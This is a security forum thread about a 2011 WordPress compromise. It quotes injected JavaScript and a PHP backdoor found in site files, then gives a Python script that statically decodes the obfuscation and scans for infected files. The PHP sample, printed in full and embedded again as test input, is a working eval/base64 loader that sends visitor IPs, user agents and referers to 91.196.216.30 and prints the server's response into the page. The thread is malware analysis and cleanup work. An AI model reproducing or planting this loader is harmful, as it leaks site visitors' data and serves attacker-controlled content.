Author Topic: http://91.196.216.30/counter.php  (Read 7068 times)


September 09, 2011, 06:50:40 am

foks

On some sites I have seen a new JavaScript starting with <script id="googleblogcontainer">. You can see the entire script on http://sakrare.ikyon.se/log.php?id=12396.

The script is encrypted and requests the file http://91.196.216.30/counter.php. That script seems very innocent:
Code:
```javascript
// Detach an element from the DOM
function remove(element) {
    var parent = element.parentNode;
    parent.removeChild(element);
}
// Re-point each injected element at a real jQuery copy, then delete it
// so nothing suspicious is left in the page source
var my = document.getElementById('googleblogcounter');
my.src = 'http://code.jquery.com/jquery-1.4.2.min.js?ver=3.0.1';
remove(my);
my = document.getElementById('googleblogcontainer');
my.src = 'http://code.jquery.com/jquery-1.4.2.min.js?ver=3.0.1';
remove(my);
```

I have not been able to find out what the script tries to do next. 91.196.216.30 is not blacklisted in Google but is on the same network as counter-wordpress.com and superpuperdomain2.com. 91.196.216.30 has also been used in the TimThumb attacks against WordPress sites.

October 17, 2011, 06:40:09 pm
Reply #1

Mofaya

The WordPress hacking continues.
In all my index files and WordPress theme files I have this  >:(
Code:
```php
<?php
$_F=__FILE__;
// Stage 2: base64 + strtr()-scrambled code that sets $url
$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';
// Stage 1: decodes and eval()s $_X
eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));
// Beacon: forward every visitor's IP, host, URI, user agent and referer to $url
// and print whatever the remote server sends back into the page
$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['HTTP_HOST'];
$uri = urlencode($_SERVER['REQUEST_URI']);
$ref = urlencode($_SERVER['HTTP_REFERER']);
$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;
$tmp = file_get_contents($url);
echo $tmp;
?>
```
Decoded to
Code:
```php
<?php $url = 'hxxp://91.196.216.30/bt.php'; ?>
```
Just Google 'hxxp://91.196.216.30/bt.php' and see the infected site results  :-[
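Both posts point at the same host, and the second one shows how the injection hides its callback: stage 1 is a base64 blob that, once eval()'d, base64-decodes stage 2, runs it through a per-character strtr() substitution and eval()s that too. The Python below is an added example, not code from either poster. It undoes that encoding statically, never executing anything, and scans file contents for the loader and beacon strings. The sample input is the injected line as posted, with the `=` and `;` that the forum rendering dropped put back; the indicator strings are my own choice, not a published signature.

```python
"""Static decoder and scanner for the base64 + strtr() PHP injection above.
Added example: nothing here is eval()'d, the encoding is simply reversed."""
import base64
import pathlib
import re

# Constructed sample input: the injected one-liner from the post, both base64
# blobs verbatim, beacon code with its '=' and ';' restored.
SAMPLE = (
    "<?php $_F=__FILE__;"
    "$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';"
    "eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));"
    "$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));"
    "$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];"
    "$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);"
    "$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref;"
    "$tmp = file_get_contents($url); echo $tmp; ?>"
)

# Loader shape: $_F=__FILE__;$_X='<stage2 b64>';eval(base64_decode('<stage1 b64>'))
LOADER_RE = re.compile(
    r"\$_F=__FILE__;\$_X='([A-Za-z0-9+/=]+)';"
    r"eval\(base64_decode\('([A-Za-z0-9+/=]+)'\)\)"
)
# The strtr() call inside stage 1 carries the substitution alphabets
STRTR_RE = re.compile(r"strtr\(\$_X,'([^']*)','([^']*)'\)")
URL_RE = re.compile(r"\$url\s*=\s*'([^']+)'")


def decode_injection(php_source):
    """Reverse both stages of one injected block without executing it.
    Returns None when the loader pattern is not present."""
    m = LOADER_RE.search(php_source)
    if not m:
        return None
    stage2_b64, stage1_b64 = m.group(1), m.group(2)
    stage1 = base64.b64decode(stage1_b64).decode("latin-1")
    s = STRTR_RE.search(stage1)
    if not s:
        return None
    frm, to = s.group(1), s.group(2)
    # PHP strtr($str, $from, $to) with string arguments is a per-character
    # map, which is exactly what str.translate does with a maketrans table.
    stage2 = base64.b64decode(stage2_b64).decode("latin-1")
    payload = stage2.translate(str.maketrans(frm, to))
    u = URL_RE.search(payload)
    return {
        "stage1": stage1,
        "strtr_from": frm,
        "strtr_to": to,
        "payload": payload,
        "url": u.group(1) if u else None,
    }


# Indicator strings chosen for this family (assumption, not a published IOC):
# the first two are the loader, the last two the visitor-data beacon.
INDICATORS = (
    "$_F=__FILE__;$_X=",
    "eval(base64_decode(",
    "file_get_contents($url",
    "echo $tmp",
)


def scan_text(php_source):
    """Return the indicators present in a file's contents (empty list = clean)."""
    return [ind for ind in INDICATORS if ind in php_source]


def scan_tree(root):
    """Walk a document root and map each flagged .php file to its indicators."""
    hits = {}
    for path in pathlib.Path(root).rglob("*.php"):
        found = scan_text(path.read_text(encoding="latin-1", errors="replace"))
        if found:
            hits[str(path)] = found
    return hits


if __name__ == "__main__":
    result = decode_injection(SAMPLE)
    print("stage 1 :", result["stage1"])
    print("payload :", result["payload"])
    print("callback:", result["url"])
    print("flags   :", scan_text(SAMPLE))
```

Running it on the sample recovers `$url = 'http://91.196.216.30/bt.php'` from the scrambled `96.69e.a6e.o0`, which is the same result Mofaya obtained; `scan_tree('/var/www')` (path is an assumption) lists every file that still carries the loader or beacon so it can be cleaned in one pass. The decoder looks only for this exact loader layout; a variant that renames `$_X` or swaps strtr() for another substitution will need the regexes adjusted.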